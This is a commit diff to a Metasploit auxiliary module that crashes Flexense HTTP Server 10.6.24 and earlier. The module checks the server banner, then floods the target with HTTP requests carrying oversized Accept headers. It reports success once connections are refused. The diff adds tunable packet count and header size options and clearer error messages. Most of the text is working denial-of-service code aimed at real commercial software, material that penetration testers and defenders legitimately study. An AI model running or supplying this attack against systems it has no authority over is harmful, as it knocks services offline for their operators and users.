Refined packet sizes and counts, improved error messages

modules/auxiliary/dos/http/flexense_http_server_dos.rb

@@ -12,7 +12,9 @@ class MetasploitModule < Msf::Auxiliary
       'Name'           => 'Flexense HTTP Server Denial Of Service',
       'Description'    => %q{
         This module triggers a Denial of Service vulnerability in the Flexense HTTP server.
-        Vulnerability caused by a user mode write access memory violation and can be triggered with rapidly sending variety of HTTP requests with long HTTP header values.
+        Vulnerability caused by a user mode write access memory violation and can be triggered with
+        rapidly sending variety of HTTP requests with long HTTP header values.
+
         Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below vesions reportedly vulnerable.
       },
       'Author' 		=> [ 'Ege Balci <ege.balci@invictuseurope.com>' ],
@@ -27,6 +29,8 @@ class MetasploitModule < Msf::Auxiliary
     register_options(
       [
         Opt::RPORT(80),
+        OptString.new('PacketCount',     [ true, "The number of packets to be sent (Recommended: Above 1725)" , 1725 ]),
+        OptString.new('PacketSize',      [ true, "The number of bytes in the Accept header (Recommended: 4088-5090"  , rand(4088..5090) ])
       ])
 
   end
@@ -37,39 +41,51 @@ class MetasploitModule < Msf::Auxiliary
       sock.put("GET / HTTP/1.0\r\n\r\n")
       res = sock.get
       if res and res.include? 'Flexense HTTP Server v10.6.24'
-        Exploit::CheckCode::Vulnerable
+        Exploit::CheckCode::Appears
       else
-        Exploit::CheckCode::Unknown
+        Exploit::CheckCode::Safe
       end
+    rescue Rex::ConnectionRefused
+      print_error("Target refused the connection")
+      Exploit::CheckCode::Unknown
     rescue
+      print_error("Target did not respond to HTTP request")
       Exploit::CheckCode::Unknown
     end
   end
 
   def run
-    unless check == Exploit::CheckCode::Vulnerable
+    unless check == Exploit::CheckCode::Appears
       fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
     end
 
-    print_status('Triggering the vulnerability')
+    size = datastore['PacketSize'].to_i
+    print_status("Starting with packets of #{size}-byte strings")
+
+    count = 0
     loop do
       payload = ""
-      payload << "GET /"+('A'*rand(8000))+" HTTP/0.9\n"
-      payload << "Host: 127.0.0.1\n"
-      payload << "User-Agent: Mozilla"+('A'*rand(8000))+"\n"
-      payload << "Accept: "+('A'*rand(8000))+"\r\n\r\n"
+      payload << "GET /" + Rex::Text.rand_text_alpha(rand(30)) + " HTTP/1.1\r\n"
+      payload << "Host: 127.0.0.1\r\n"
+      payload << "Accept: "+('A' * size)+"\r\n"
+      payload << "\r\n\r\n"
       begin
         connect
         sock.put(payload)
         disconnect
+        count += 1
+        break if count==datastore['PacketCount']
+      rescue ::Rex::InvalidDestination
+        print_error('Invalid destination!  Continuing...')
       rescue ::Rex::ConnectionTimeout
-        print_error('Connection timeout !')
+        print_error('Connection timeout!  Continuing...')
       rescue ::Errno::ECONNRESET
-        print_error('Connection reset !')
+        print_error('Connection reset!  Continuing...')
       rescue ::Rex::ConnectionRefused
-        print_good("DoS successful #{rhost} is down !")
-        break
+        print_good("DoS successful after #{count} packets with #{size}-byte headers")
+        return true
       end
     end
+    print_error("DoS failed after #{count} packets of #{size}-byte strings")
   end
 end